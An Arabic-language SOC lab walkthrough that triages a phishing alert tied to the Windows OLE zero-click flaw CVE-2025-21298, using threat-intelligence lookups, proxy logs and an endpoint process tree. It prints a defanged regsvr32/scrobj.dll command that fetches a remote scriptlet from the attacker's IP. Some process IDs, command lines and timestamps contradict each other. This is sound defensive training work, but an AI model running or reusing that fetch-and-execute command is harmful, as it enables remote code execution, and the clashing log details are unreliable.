
SOC336 - كشف استغلال RCE بدون نقرة في Windows OLE (CVE-2025-21298) - شرح تفصيلي
تلقى أحد موظفينا، أوستن، بريدًا إلكترونيًا تصيديًا من مرسل مشبوه، وتم تشغيل تنبيه بعد أن فتح البريد الإلكتروني باستخدام Outlook في 4 فبراير 2025 الساعة 4:18 مساءً. كان سبب التشغيل هو "تم تحديد مرفق RTF ضار يحتوي على نمط استغلال معروف CVE-2025-21298" .
معرف الحدث (EventID) : 314
وقت الحدث : 4 فبراير 2025 الساعة 4:18 مساءً (أعتقد أنه كان خطأ)
القاعدة : SOC336 - تم الكشف عن استغلال OLE ذو النقر الصفري من Windows (CVE-2025-21298)
المستوى : محلل أمني
عنوان SMTP : 84.38.130.118
عنوان المصدر : [email protected]
عنوان الوجهة : [email protected]
موضوع البريد الإلكتروني : مهم: إجراء مطلوب لموعد التسليم النهائي للمشروع القادم
المرفق : mail.rtf
تجزئة المرفق : df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184
إجراء الجهاز : مسموح
سبب التشغيل : تم تحديد مرفق RTF ضار يحتوي على نمط استغلال معروف CVE-2025-21298.
دعنا نتعمق في سجلات أمان البريد الإلكتروني وإدارة السجلات وأمان نقطة النهاية لفرز التنبيه.
بحثت عن عنوان المرسل projectmanagement@pm[.]me وضغطت على البريد الإلكتروني "مهم: إجراء مطلوب لموعد التسليم النهائي للمشروع القادم" الذي أُرسل في الساعة 05:12 صباحًا من نفس اليوم، وهو ما بدا غريبًا بالنسبة لي لأن النغمة العاجلة والكلمات مثل "مهم" و"إجراء مطلوب" أعطتني فكرة أنه بريد إلكتروني تصيدي.
بحثت عن النطاق pm[.]me على VirusTotal واعتبره بائع واحد فقط مشبوهًا.
ومع ذلك، عندما بحثت عن عنوان SMTP 84[.]38[.]130[.]118، أبلغ 7 بائعين عنه كضار وبرمجيات خبيثة، وكان مرتبطًا بخادم SILVER C2.
تم العثور على 84[.]38[.]130[.]118 أيضًا في قاعدة بيانات AbuseIPDB. يقع في ريغا، ريغا، لاتفيا، وينتمي إلى اسم النطاق rixhost.lv ويُصنف ضمن هجمات حجب الخدمة (DDoS) والاختراق والمضيف المُستغل.
أخيرًا، بحثت عن التجزئة df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184 للمرفق mail.rtf على VirusTotal، وأبلغ 29 من أصل 61 بائعًا عن المرفق كضار. إنه ينتمي إلى عائلة البرامج الضارة rtfmalformb وكان مرتبطًا بثغرة CVE-2025-21298.
تم التأكيد على أنه تم إرسال بريد إلكتروني تصيدي مع مرفق ضار إلى أوستن.
دعنا نتحقق مما إذا كانت هناك أنشطة مشبوهة بعد الساعة 05:12 صباحًا عندما فتح أوستن البريد الإلكتروني التصيدي.
أولاً، راجعت سجل الوكيل وبحثت عن عنوان IP الضار للمرسل 84[.]38[.]130[.]118، واكتشفت أنه في الساعة 08:06 صباحًا كان هناك طلب HTTP GET إلى عنوان IP الضار بعنوان URL hxxp://84[.]38[.]130[.]118/shell[.]sct ببدء من cmd.exe، حيث كان يقوم بتنزيل ملف Windows scriptlet. كان رمز الاستجابة 200 OK، مما يشير إلى أن حركة المرور الصادرة مسموح بها ولم يتم حظرها بواسطة جدار الحماية. كان من غير المعتاد الحصول على ملف سكريبت قد يحتوي على سكريبت شيل عكسي.
نظرًا لأن حركة المرور الصادرة إلى عنوان IP الضار تم بدؤها بواسطة cmd.exe، فقد راجعت أولاً تاريخ الطرفية ووجدت أنه في الساعة 08:06:08 صباحًا تم تنفيذ أمر "C:\Windows\System32\cmd.exe /c regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" لاستدعاء regsvr32.exe لجلب ملف السكريبت من عنوان IP الضار بواسطة scrobj.dll
يمكن أن يترك استخدام الأدوات المدمجة في Windows لجلب السكريبت آثارًا قليلة على النظام، مما يجعل عمليات الهندسة العكسية وتحليل البرامج الضارة أكثر صعوبة!
تم التأكيد على وجود اتصال بعنوان IP الضار 84[.]38[.]130[.]118 في الساعة 08:06:42 صباحًا، بعد حدث تنفيذ الأمر.
إذن لماذا تم تنفيذ cmd.exe بمجرد النقر على بريد إلكتروني؟ بينما لم يتم العثور على أي دليل على تنزيل أوستن للمرفق الضار mail.rtf، راجعت سجلات نقطة النهاية وبحثت عن أي حدث حوالي الساعة 08:06 صباحًا.
معرف العملية: 7023
وقت الحدث: 4 فبراير 2025 08:06:25
سطر الأوامر: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"
العملية الأم: cmd.exe
حسنًا، دعنا نرى العملية الأم cmd.exe
معرف العملية: 6784
وقت الحدث: 4 فبراير 2025 08:06:08
سطر الأوامر: "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll"
العملية الأم: outlook.exe
وأخيرًا، راجعت العملية الأم لـ outlook.exe
معرف العملية: 4820
وقت الحدث: 4 فبراير 2025 08:05:15
سطر الأوامر: "C:\Windows\System32\cmd.exe"
العملية الأم: explorer.exe
إذن يمكننا استنتاج العمليات الضارة في شجرة:
explorer.exe -> outlook.exe (PID:4820) -> cmd.exe (PID:4784) -> regsvr32.exe (PID:7023) -> ! تنفيذ السكريبت !
ومع ذلك، كنت لا أزال أتساءل كيف تم بدء العمليات الضارة بدون تنزيل وفتح المرفق الضار، وكيف قام outlook.exe باستدعاء العملية الضارة حتى وجدت معلومات حول CVE-2025-21298.
وفقًا للمقال من Offsec، كانت هناك ثغرة حرجة في OLE من Windows ذات نقر صفري تمكن من تنفيذ التعليمات البرمجية عن بعد عبر البريد الإلكتروني بدرجة CVSS 9.8 في يناير 2025. عندما يقوم المستلم المستهدف ببساطة بفتح أو معاينة البريد الإلكتروني الضار في Microsoft Outlook الذي يحتوي على مستند RTF ضار مع سكريبت مضمن ، يتم تشغيل الثغرة، مما يسمح للمهاجم بتنفيذ تعليمات برمجية عشوائية على النظام المتأثر.
قمت ببعض البحث حول Windows OLE وعمليات اختطاف مستندات RTF على Google وGemini وربطها ببعض معرفتي بالهندسة العكسية:
غير معزول
ضار
تم الوصول
التصنيف: حرج
النوع: برمجيات ضارة
وقت النشاط:
4 فبراير 2025 الساعة 05:12 صباحًا (استلام البريد الإلكتروني التصيدي)
4 فبراير 2025 من الساعة 08:05:15 صباحًا إلى الساعة 08:06:42 صباحًا (فتح البريد الإلكتروني التصيدي وتنفيذ التعليمات البرمجية الضارة)
الكيانات المتأثرة:
عنوان المصدر: projectmanagement@pm[.]me
عنوان SMTP: 84[.]38[.]130[.]118
عنوان البريد الإلكتروني للمستلم: Austin@letsdefend[.]io
عنوان IP للمستلم: 172[.]16[.]17[.]137
اسم المضيف: Austin
أسباب الإيجابية الحقيقية:
في 4 فبراير 2025 الساعة 05:12 صباحًا، تم إرسال بريد إلكتروني مشبوه بموضوع "مهم: إجراء مطلوب لموعد التسليم النهائي للمشروع القادم" من [email protected] (عنوان IP: 84.38.130.118) إلى [email protected] (عنوان IP: 172.16.17.137) مع مرفق mail.rtf (تجزئة SHA256: df993d037cdb77a435d6993a37e7750dbbb16b2df64916499845b56aa9194184). أعطت نغمات الإلحاح والكلمات المستخدمة في الموضوع فكرة عن بريد إلكتروني تصيدي. أبلغت أداة استخبارات التهديدات VirusTotal وAbuseIPDB عن عنوان IP للمرسل، الموجود في ريغا، ريغا، لاتفيا والتابع لاسم النطاق rixhost.lv، والمرفق كضار وبرمجيات خبيثة.
وفقًا لسجلات الوكيل، في الساعة 08:06 صباحًا كان هناك طلب HTTP GET إلى عنوان IP الضار بعنوان URL hxxp://84[.]38[.]130[.]118/shell[.]sct ببدء من cmd.exe، حيث كان يقوم بتنزيل ملف Windows scriptlet. كان رمز الاستجابة 200 OK، مما يشير إلى أن حركة المرور الصادرة إلى عنوان IP الضار مسموح بها ولم يتم حظرها بواسطة جدار الحماية.
وفقًا لسجلات أمان نقطة النهاية، تم بدء التعليمات البرمجية الضارة "regsvr32.exe /s /u /i:hxxp[://]84[.]38[.]130[.]118[.]com/shell[.]sct scrobj.dll" (معرف العملية: 7023) بواسطة cmd.exe (معرف العملية: 6784) المستدعاة من outlook.exe (معرف العملية: 4820)
كان الاستغلال ناتجًا عن ثغرة حرجة في Windows OLE ذات نقر صفري (CVE-2025-21298) تمكن من تنفيذ التعليمات البرمجية عن بعد عبر البريد الإلكتروني بدرجة CVSS 9.8 في يناير 2025. عندما يقوم المستلم المستهدف ببساطة بفتح أو معاينة البريد الإلكتروني الضار في Microsoft Outlook الذي يحتوي على مستند RTF ضار مع سكريبت مضمن، يتم تشغيل الثغرة، مما يسمح للمهاجم بتنفيذ تعليمات برمجية عشوائية على النظام المتأثر، مما قد يؤدي إلى إنشاء شيل عكسي لخادم القيادة والتحكم (C2).
أسباب التصعيد:
بينما لم يتم ملاحظة حركة مرور شبكة C2 نشطة بعد الاستغلال بشكل قاطع حتى الآن، أكدت سجلات أمان نقطة النهاية تنفيذ regsvr32.exe باستخدام scrobj.dll لجلب ملف scriptlet shell.sct. نظرًا لدرجة CVSS 9.8 لـ CVE-2025-21298، هناك حاجة إلى مزيد من التحقيق للتحقق من وجود أي نشاط مشبوه على المضيف مثل الثبات أو تسريب البيانات.
الإصلاحات:
مؤشرات الاختراق: